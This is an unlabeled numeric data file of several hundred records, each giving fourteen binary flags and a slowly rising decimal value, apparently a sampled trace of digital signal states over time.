0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2954220e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,2.2954224e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954228e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954244e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954268e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954316e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954340e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954368e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954392e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954416e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954444e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954468e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954492e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954516e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954540e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2954548e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2954592e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2954620e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,2.2954624e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954628e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954644e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954668e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954692e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954716e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2954724e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2954768e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2954792e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954800e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954820e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954844e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954868e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954892e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954916e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954940e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2954968e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2954992e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955020e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,2.2955044e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955048e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955092e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955116e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955124e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955168e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955192e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955220e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955244e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955268e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955292e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955316e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955340e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955348e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955392e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955420e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,2.2955424e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955428e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955444e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955468e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955472e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955492e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955516e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955540e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955564e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955592e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955620e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955644e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955668e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955716e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955740e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955768e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955792e-02 0,1,1,1,1,1,0,0,0,0,0,0,0,0,2.2955796e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955800e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955816e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955844e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955868e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955892e-02 0,1,1,1,1,0,0,0,0,1,0,0,0,0,2.2955896e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955900e-02 0,1,1,1,1,1,0,0,0,1,0,0,1,0,2.2955940e-02 0,1,1,1,1,1,0,0,0,1,0,0,0,0,2.2955968e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2955972e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2955992e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956016e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956044e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956068e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956092e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956164e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956188e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956212e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956240e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956264e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956340e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956388e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956412e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956440e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956464e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956564e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956588e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956612e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956640e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956664e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956692e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956716e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956764e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956788e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956812e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956840e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956864e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956892e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956916e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2956964e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2956988e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957012e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957040e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957064e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957092e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957164e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957188e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957212e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957240e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957264e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957340e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957388e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957412e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957440e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957464e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957564e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957588e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957612e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957640e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957664e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957692e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957716e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957764e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957788e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957812e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957840e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957864e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957892e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957916e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2957964e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2957992e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958012e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958040e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958064e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958092e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958164e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958192e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958212e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958240e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958264e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958340e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958392e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958412e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958440e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958464e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958492e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958516e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958540e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958564e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958592e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958612e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958640e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958664e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958692e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958716e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958740e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958764e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958792e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958812e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958840e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958864e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958892e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958916e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958940e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2958964e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2958988e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959012e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959040e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959064e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959092e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959116e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959140e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959164e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959188e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959212e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959240e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959264e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959292e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959316e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959340e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959364e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959388e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959412e-02 0,1,1,1,1,0,0,0,0,0,0,0,1,0,2.2959440e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,0,2.2959464e-02 0,1,1,1,1,0,0,0,0,0,0,0,0,1,2.3083956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,2.3084124e-02 1,1,1,1,1,0,0,0,0,0,0,1,0,1,2.3084164e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,2.3084184e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3084788e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3085220e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3085244e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085252e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3085276e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085308e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3085348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085376e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085380e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3085400e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085424e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085432e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3085476e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085500e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085508e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3085524e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085556e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3085572e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085600e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085604e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3085624e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085652e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.3085656e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085660e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3085700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085724e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3085776e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085800e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3085852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3085876e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085880e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3085900e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3085924e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3085976e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086000e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086008e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086028e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,2.3086052e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086056e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3086100e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086124e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086132e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086172e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086200e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086224e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086276e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086324e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086332e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3086376e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086400e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.3086404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086408e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086428e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,2.3086452e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086456e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3086476e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086508e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086576e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086628e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086652e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086724e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086732e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3086748e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086772e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3086828e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086860e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3086876e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086900e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,2.3086904e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086908e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3086924e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3086948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3086956e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087000e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087076e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087100e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087176e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087228e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,2.3087252e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3087256e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3087276e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3087300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087308e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087324e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087348e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087372e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087400e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3087404e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3087452e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3087476e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087484e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087572e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087600e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087624e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087676e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087724e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3087732e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3087776e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3087800e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3087828e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3087852e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.3087856e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087860e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3087972e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3087996e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088048e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088072e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3088076e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3088100e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3088124e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088132e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088172e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088248e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088272e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088372e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,2.3088376e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3088380e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3088424e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3088448e-02 1,1,1,1,1,1,0,0,0,0,0,0,0,0,2.3088452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088456e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088472e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088500e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088524e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088548e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088572e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088596e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3088604e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,2.3088648e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,2.3088672e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088680e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088724e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088772e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088796e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088820e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088848e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088872e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3088972e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3088996e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089020e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089048e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089072e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089124e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089172e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089196e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089220e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089248e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,2.3089272e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,2.3089300e-02 